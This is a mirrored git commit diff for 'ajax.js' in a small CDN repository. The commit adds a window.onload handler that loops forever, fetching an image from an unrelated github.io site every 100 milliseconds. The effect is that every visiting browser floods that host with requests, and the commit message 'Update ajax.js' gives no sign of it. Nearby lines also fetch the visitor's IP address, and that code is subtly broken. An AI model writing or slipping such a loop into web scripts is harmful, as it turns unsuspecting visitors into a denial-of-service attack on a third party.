mirror of
https://github.com/hexahigh/cdn.git
synced 2025-12-11 20:15:22 +01:00
Update ajax.js
This commit is contained in:
parent
1954b74b69
commit
c399783b09
@ -15,3 +15,10 @@ function delay(milliseconds){
|
|||||||
$.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/getip", function(data) {
|
$.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/getip", function(data) {
|
||||||
})
|
})
|
||||||
var userip = (data.ip);
|
var userip = (data.ip);
|
||||||
|
|
||||||
|
window.onload = async function startdown(){
|
||||||
|
while(true) {
|
||||||
|
await delay(100);
|
||||||
|
fetch('https://t0m0t0w.github.io/favicon.png')
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user